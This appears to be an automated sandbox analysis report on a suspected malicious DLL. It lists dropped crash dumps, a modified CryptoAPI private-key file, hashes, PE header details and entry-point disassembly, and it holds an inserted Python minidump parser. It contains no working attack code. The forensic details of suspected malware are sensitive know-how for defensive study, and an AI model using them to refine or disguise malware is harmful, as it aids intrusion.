MD5:43BAB30A12B9C79425777ED1B6EA1D8E
SHA1:59B5BE82616F50DC63A7F600E6ACA6AD11057F52
SHA-256:BA1CC68C780845B86EB9C8F44D611583244F4E75D27B571A46B4E4105607C236
SHA-512:9643D50D606B4BA93330BE5DE028A4D52E5AD4BF7EABBFCDCA094EB07459CCB2422BF51D4FD52C00B285B36E217576C46CC8FA9C89FAE1A4DCFA1B14B41CCC8A
Malicious:false
Reputation:low
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0B3.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Apr 8 12:29:31 2021, 0x1205a4 type
Category:dropped
Size (bytes):69362
Entropy (8bit):2.0838765716463046
Encrypted:false
SSDEEP:192:WzxBx/JhX37iYllk1UeZzPcp2OI65rAAT0j5m+KO1kDZ40co8NhMXtgpZKh6UsPA:Yn7Nocp2h658AI1KZ4eO2gZKqZdLs
MD5:11BABEB8443873140C5FFFD59A4859A0
SHA1:F145EF81A373D81BB420F53E173C0488682F3C10
SHA-256:7BD214E29D65814A7247A97E5C0CA7995F81985AEAF0C4D89E18145BA252F7B9
SHA-512:4719E68EE4FAFE8521B0223C6C831D48444F949962EB50C2174E22E50076589AC0EA0884889D1F3582FA3EACAE236B947D0FC419D85A2A1FA9C36EF3B1E60A7A
Malicious:false
Reputation:low
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0D2.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Apr 8 12:29:32 2021, 0x1205a4 type
Category:dropped
Size (bytes):76724
Entropy (8bit):1.98536722039344
Encrypted:false
SSDEEP:384:vLrhLY4R/gX6vqy3Ze1EG3CjKhQ51zrJZtzT:vLO6vqy34263qzVb
MD5:26314EB10423593B8775470283F25386
SHA1:721A02C21AC42C9589F49216A79CAD9E28E66116
SHA-256:6D0C9A5A5EC79D125846A560D2DE9407CCA05F3C430C4CA5C5384ED3C90DDD32
SHA-512:275A3540E55CAA38DA6CE0F81B922759A39F20F1D6EB765F9650F341CAF01435091D65B200DD215C7D5E157226F7A74761B355AAEA9A5C9B30567B566C85EA86
Malicious:false
Reputation:low
Preview: MDMP....... .......,.n`...................U...........B......H%......GenuineIntelW...........T...........&.n`.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8E1.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8292
Entropy (8bit):3.7002327632724343
Encrypted:false
SSDEEP:192:Rrl7r3GLNiCg6ieNH7H6Y1+6rgmfTlS1+prB89bWOsffSm:RrlsNil6LN76Ys6rgmfTlSPWNfr
MD5:5E603E5F60061153C133783DEE237FEF
SHA1:B2EFC05FA8A53317C95A808E2E480A6866669C48
SHA-256:6E2021C4CF13AF2EF78FFE9C7426F0F1CEE5AB05E42844E02B2EBB94F26E8829
SHA-512:6EE8558CA2059B3F1B82A8A1849724815492744FE7927A29C1C327CEFAC16191DB6DF591E86124262BDC691E74FACBAC06CD48D7D3435AA54FA467AF3E608B4A
Malicious:false
Reputation:low
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.3.2.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA99D.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8282
Entropy (8bit):3.6968782999776884
Encrypted:false
SSDEEP:192:Rrl7r3GLNiBe6rbx7c6Ytt6cgmfTlS1+pr389bWqsfxSm:RrlsNiY6rbG6YH6cgmfTlSJWJfl
MD5:133C6D7239DB97584D2608100DD48BA8
SHA1:0F541A791FEC9F1CADE7871FADE60B8F46346E3D
SHA-256:577B2BCB43894D70D6865D60F493F4996C432997BF771C77E36719435D56B32B
SHA-512:C70B6650AA0E4D69FCB95E4DB3921C24D3DAF3F87B0B415A2D7966266F0E20B8F2021DF7223D04A0A4BACF8E12E2B1D37065C7B987D34C28A2C334488070B759
Malicious:false
Reputation:low
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.0.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB05.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4669
Entropy (8bit):4.500901840326026
Encrypted:false
SSDEEP:48:cvIwSD8zssJgtWI9eUVWSC8Bid18fm8M4JCdejZFh+q8/oz/4SrSmd:uITfqVRSNAIJ7dD/DWmd
MD5:74F53426B5EC09FC00D74426B021F886
SHA1:2B2DA45D18F928584DC7CB8302B217A04950A8A3
SHA-256:DF16B82786D1296D0955D2F0E66FEBB85F56CDF6896E4415049C917EEFEC43FB
SHA-512:C3445A3F65D33A682DB1DEE3E2108BD964479F80A405FECBEB0E89B5A87A6746AC999A6625B2F95D0161976ED2B0651E8D465E319D884A2CDE0E0658A305DCB2
Malicious:false
Reputation:low
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937300" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WERABF0.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4669
Entropy (8bit):4.500862773852269
Encrypted:false
SSDEEP:48:cvIwSD8zssJgtWI9eUVWSC8Biq8fm8M4JCdejZFb+q8/ozC4SrSnd:uITfqVRSNAfJ7XDCDWnd
MD5:D6630F9DC50064A95F0799E624D27429
SHA1:3CB30D4DB5B8AC85F23785EF9FD901B94D9E657F
SHA-256:60C2843A40CC04E9545C7A5DB5E5EF33A4E131809ABF0DE46175C986949D4B11
SHA-512:69AFBA39CE60A2C9DFF034D4919F64C16B766F92E924F76FE4184BF2F47B1A6D4A187EA4869A686D8C8185FB1A5941636523C47830F36F8A785BD649EFE86978
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937300" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEDC.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Apr 8 12:29:36 2021, 0x1205a4 type
Category:dropped
Size (bytes):72414
Entropy (8bit):1.9780823290006586
Encrypted:false
SSDEEP:384:cYkYU7AFXrbp831KZoeOqAvKM5vOyN9jI:cYkYOAp92IZbAtmyr0
MD5:A51999AF613CCA8FA575C3F29CE4D9E1
SHA1:CCB0BE5B8844232810D5CA7426484BADC6661526
SHA-256:E59AC12A44C48D3345B1951992A4A7ED17DDC201A041E4EF980A6A3907B99976
SHA-512:98BAFBC9718DD9CF1F3C5A7768303FC780B5B5BEB2434E3465ECDA94592EC140F5C0CF31A492E3A37F8DBE8E1C972063F34F3B82658EC10781252726799F3FFB
Malicious:false
Preview: MDMP....... .......0.n`...................U...........B.......%......GenuineIntelW...........T.......x...).n`.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
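The `File Type` line of each WER `.dmp` entry above (`14 streams`, the timestamp, `0x1205a4 type`) is read straight from the 32-byte minidump header. The reader below is an added example, not part of the sandbox report, that parses that header, walks the stream directory and pulls the exception record, and decodes the `Flags` field so you know what the dump contains before opening it in a debugger. Standard library only. The dump used in the self-test is built by `build_sample_dump()`; its thread id, exception code and fault address are invented for the test, only the timestamp and the flags value are taken from the report.

```python
"""Read a minidump (MDMP) header, stream directory and exception stream.

Added example, not part of the sandbox report. The dump built by
build_sample_dump() is constructed for the self-test: thread id,
exception code and fault address are invented; timestamp and Flags
match the WER dumps listed in the report.
"""
import struct
import sys
from datetime import datetime, timezone

HEADER_FMT = "<4sIIIIIQ"   # Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum, TimeDateStamp, Flags
DIR_ENTRY_FMT = "<III"     # StreamType, DataSize, Rva
EXCEPTION_STREAM = 6

STREAM_NAMES = {3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
                6: "ExceptionStream", 7: "SystemInfoStream", 9: "Memory64ListStream",
                15: "MiscInfoStream", 16: "MemoryInfoListStream", 17: "ThreadInfoListStream"}

MINIDUMP_TYPE = {  # MINIDUMP_TYPE bits (dbghelp.h)
    0x1: "MiniDumpWithDataSegs", 0x2: "MiniDumpWithFullMemory", 0x4: "MiniDumpWithHandleData",
    0x8: "MiniDumpFilterMemory", 0x10: "MiniDumpScanMemory", 0x20: "MiniDumpWithUnloadedModules",
    0x40: "MiniDumpWithIndirectlyReferencedMemory", 0x80: "MiniDumpFilterModulePaths",
    0x100: "MiniDumpWithProcessThreadData", 0x200: "MiniDumpWithPrivateReadWriteMemory",
    0x400: "MiniDumpWithoutOptionalData", 0x800: "MiniDumpWithFullMemoryInfo",
    0x1000: "MiniDumpWithThreadInfo", 0x2000: "MiniDumpWithCodeSegs",
    0x4000: "MiniDumpWithoutAuxiliaryState", 0x8000: "MiniDumpWithFullAuxiliaryState",
    0x10000: "MiniDumpWithPrivateWriteCopyMemory", 0x20000: "MiniDumpIgnoreInaccessibleMemory",
    0x40000: "MiniDumpWithTokenInformation", 0x80000: "MiniDumpWithModuleHeaders",
    0x100000: "MiniDumpFilterTriage",
}


def decode_flags(flags: int) -> list:
    """Names of the MINIDUMP_TYPE bits set in the header Flags field."""
    return [name for bit, name in sorted(MINIDUMP_TYPE.items()) if flags & bit]


def parse_minidump(data: bytes) -> dict:
    """Header -> stream directory -> exception stream (if present)."""
    sig, version, nstreams, dir_rva, _checksum, ts, flags = struct.unpack_from(HEADER_FMT, data, 0)
    if sig != b"MDMP":
        raise ValueError("not a minidump")
    streams = []
    for i in range(nstreams):
        stype, size, rva = struct.unpack_from(DIR_ENTRY_FMT, data, dir_rva + i * struct.calcsize(DIR_ENTRY_FMT))
        streams.append({"type": stype, "name": STREAM_NAMES.get(stype, f"Stream({stype})"),
                        "size": size, "rva": rva})
    info = {"version": version & 0xFFFF, "streams": streams,
            "timestamp": datetime.fromtimestamp(ts, tz=timezone.utc),
            "flags": flags, "flag_names": decode_flags(flags),
            "full_memory": bool(flags & 0x2), "exception": None}
    for s in streams:
        if s["type"] == EXCEPTION_STREAM:
            # MINIDUMP_EXCEPTION_STREAM: ThreadId, 4-byte pad, then MINIDUMP_EXCEPTION
            # (ExceptionCode, ExceptionFlags, ExceptionRecord, ExceptionAddress, ...)
            tid, code, addr = struct.unpack_from("<I4xI4x8xQ", data, s["rva"])
            info["exception"] = {"thread_id": tid, "code": code, "address": addr}
    return info


def build_sample_dump(ts: int = 1617884972, flags: int = 0x1205A4) -> bytes:
    """Constructed two-stream dump: an access-violation record plus an empty module list."""
    exc_rva = 0x40
    exc = struct.pack("<II", 0x1BDC, 0)                                   # ThreadId, alignment (invented)
    exc += struct.pack("<IIQQII", 0xC0000005, 0, 0, 0x011B1916, 2, 0)     # MINIDUMP_EXCEPTION head (invented address)
    exc += struct.pack("<15Q", 0, 0x011B1916, *([0] * 13))                # ExceptionInformation[15]
    exc += struct.pack("<II", 0, 0)                                       # ThreadContext location descriptor
    mod_rva = exc_rva + len(exc)
    header = struct.pack(HEADER_FMT, b"MDMP", 0xA793, 2, 0x20, 0, ts, flags)
    directory = struct.pack(DIR_ENTRY_FMT, EXCEPTION_STREAM, len(exc), exc_rva)
    directory += struct.pack(DIR_ENTRY_FMT, 4, 4, mod_rva)
    blob = header + directory
    return blob + bytes(exc_rva - len(blob)) + exc + struct.pack("<I", 0)


def main(path=None):
    info = parse_minidump(open(path, "rb").read() if path else build_sample_dump())
    print(f"version 0x{info['version']:x}, {len(info['streams'])} streams, "
          f"{info['timestamp']:%Y-%m-%d %H:%M:%S} UTC, flags 0x{info['flags']:x}")
    print("type:", ", ".join(info["flag_names"]))
    for s in info["streams"]:
        print(f"  {s['name']:<24} size=0x{s['size']:x} rva=0x{s['rva']:x}")
    if info["exception"]:
        e = info["exception"]
        print(f"exception 0x{e['code']:08x} at 0x{e['address']:x} in thread 0x{e['thread_id']:x}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else None)
```

Run it against `WERA0D2.tmp.dmp` or `WERAEDC.tmp.dmp` to list their 14 streams. Decoding `0x1205a4` shows `MiniDumpFilterTriage` and `MiniDumpWithoutOptionalData` set and `MiniDumpWithFullMemory` clear, which is why each dump is only about 75 KB: the exception record, thread stacks and module list are present, but the heap and the dynamically allocated code regions are not, so these dumps give you the crash site, not the decrypted payload.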
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB99B.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8284
Entropy (8bit):3.697156374563282
Encrypted:false
SSDEEP:192:Rrl7r3GLNiwQ69NH7x6YtQc6cgmfTlS1+prY89bybsfKGm:RrlsNi369N96YOc6cgmfTlSkygfC
MD5:7A9B32A1B8C07143AD1744B6C10C62F1
SHA1:50BD285C3D7ECE7975E8A2747F01991C0FFA40CE
SHA-256:7179B2B7E5D28F9983BC5709FB89D2101195A696AB4ACB54A5D4E6B27B526E1A
SHA-512:A9A63DC4ED097581CB8F8A2C08EBFE7066FDF4DA5E9F2C8E29F090999A3F473C7EBF261550A83DDA3F7349989AD8321B07890376199DCF324FFB35282F7B58C4
Malicious:false
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.5.2.<./.P.i.d.>.......
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC5B.tmp.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4669
Entropy (8bit):4.500815625173022
Encrypted:false
SSDEEP:48:cvIwSD8zssJgtWI9eUVWSC8Biz8fm8M4JCdejZF6v+q8/ozSA4SrS9d:uITfqVRSNAQJ7YDlDW9d
MD5:72F72E6CF14F55E38E2822BF6843E620
SHA1:B9CE2A3CE2A734C6A459C7B9568E3767D5DFEAA0
SHA-256:876985750B219F0CFE399B64CAF5BCD01773A4081DEE6FED5461DFEB3FDAD174
SHA-512:3B2ED66AC27D4C9B03F2E914DB3B3907906B2FC2BA5E26E9B0DFD6CDC1EEEBB40DEA29BFC69A831C10CBD62FFB9B76ED2A4135F75AAD99B8E042A0FA90933880
Malicious:false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937300" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:data
Category:modified
Size (bytes):2132
Entropy (8bit):7.078049608180308
Encrypted:false
SSDEEP:48:Jb6UE0wURPA+UCxdKEAIJVpfb6UE6Kzp7LHfv0QhGM2dWEaNAO0:Jb6k5PA+UCJVpfb6RN//vVGMW2z0
MD5:E80D7177BA4A73162E8068C469E4D40D
SHA1:C160660F8B829ABCE22E986E947FA3CD3C87070F
SHA-256:09E0C102612AE962EC78E8656ABAAF16A27886BBE9C76FCEADC6766F24251EDE
SHA-512:E12CE12D5BBF82F36F6D45776B69212AFB092B8E36F0750813A2FFA46DBA419D872A370A6579D1DEC8C886966B91A59408001676430253F16D08B337011AA820
Malicious:false
Preview: ....................\...................user.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O.........\p.O...P........,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... .....)...Q,w*..C......n"...4.>............. ....y...Z ..2..q.F."y3X..K....H.....@....~...?.5....T.....E....a...r.|..!.J2.....&.....>.....#.L=.).Lk{.z.R..%.`.%..Z...E. 6h<f..~&.u0..jgD.L.w..5X.U.....;.k.1.^..vP...!.......v..k....2.FIv#..X~.......D...t..>.........EYUB.rf...V5.fw...sM..=RmJ}....../...O.,_~.?./.fe.....V..Z.2...Z....-q..S-wl.f...x..Ax........O..\>.r.....F1.....<..S..{e`...k_9....h.....I..!......X..p.P....."n..\e....`a..9....;zW.<g.3b[u...!@.....z......Y...i.%{_..g.......G...n....w..[.qn.&+.Tg.-.................z..O.........\p.O...P............E.x.p.o.r.t. .F.l.a.g....f...... ...d..;.Z.C..Q.z...........Y.T..c............. ....)...-"....?}.b.".......h..H......\*.B..:.M..... @.

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):5.690395065467963
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:4123.dll
File size:49152
MD5:f776deb4df137b37dcae5406c8f3a07a
SHA1:f6a31b594fca39c118927405fa4d14353b8fd49a
SHA256:93cc5e6a6b671d9b0124ade32ae8b09269de9f03c5c5e66347fbfc7a8c3b305e
SHA512:4077b4214b4683bb4776d470027e61fcc3cb3e78beb9377674e4a4de9115d52911e39cb29a566ab446c6962a252ce01020ffd616b5854a9d8230414262bfafe2
SSDEEP:768:fw2jnhaqqUgQeONXr27iLAkfP69FyfQZWBS:hjnEQeON727CA2G
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[E...$...$...$...8...$...;...$..};...$...$..L$...;...$..."...$...;...$..Rich.$..........................PE..L.....b`...........

File Icon

Icon Hash:7575757575759ab2

Static PE Info

General

Entrypoint:0x10001aa1
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:0x60620D8C [Mon Mar 29 17:25:32 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:17bfed211106b3e7d0f15493e6716264

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ebx
mov ebx, dword ptr [ebp+08h]
push esi
mov esi, dword ptr [ebp+0Ch]
push edi
mov edi, dword ptr [ebp+10h]
test esi, esi
jne 00007FDD60AAC09Bh
cmp dword ptr [1000378Ch], 00000000h
jmp 00007FDD60AAC0B8h
cmp esi, 01h
je 00007FDD60AAC097h
cmp esi, 02h
jne 00007FDD60AAC0B4h
mov eax, dword ptr [10003794h]
test eax, eax
je 00007FDD60AAC09Bh
push edi
push esi
push ebx
call eax
test eax, eax
je 00007FDD60AAC09Eh
push edi
push esi
push ebx
call 00007FDD60AABFAAh
test eax, eax
jne 00007FDD60AAC096h
xor eax, eax
jmp 00007FDD60AAC0E0h
push edi
push esi
push ebx
call 00007FDD60AAC0EEh
cmp esi, 01h
mov dword ptr [ebp+0Ch], eax
jne 00007FDD60AAC09Eh
test eax, eax
jne 00007FDD60AAC0C9h
push edi
push eax
push ebx
call 00007FDD60AABF86h
test esi, esi
je 00007FDD60AAC097h
cmp esi, 03h
jne 00007FDD60AAC0B8h
push edi
push esi
push ebx
call 00007FDD60AABF75h
test eax, eax
jne 00007FDD60AAC095h
and dword ptr [ebp+0Ch], eax
cmp dword ptr [ebp+0Ch], 00000000h
je 00007FDD60AAC0A3h
mov eax, dword ptr [10003794h]
test eax, eax
je 00007FDD60AAC09Ah
push edi
push esi
push ebx
call eax
mov dword ptr [ebp+0Ch], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
pop esi
pop ebx
pop ebp
retn 000Ch
jmp dword ptr [10002034h]
jmp dword ptr [1000203Ch]
cmp dword ptr [esp+08h], 01h
jne 00007FDD60AAC0A5h
cmp dword ptr [10003794h], 00000000h
jne 00007FDD60AAC09Ch
push dword ptr [esp+04h]
call dword ptr [1000200Ch]
push 00000001h
pop eax
retn 000Ch

Rich Headers

Programming Language:
  • [ C ] VS98 (6.0) build 8168
  • [RES] VS98 (6.0) cvtres build 1720
  • [C++] VS98 (6.0) build 8168
  • [LNK] VS98 (6.0) imp/exp build 8168

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2230 | 0x48 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x204c | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x6920 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb000 | 0xcc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x48 | .rdata
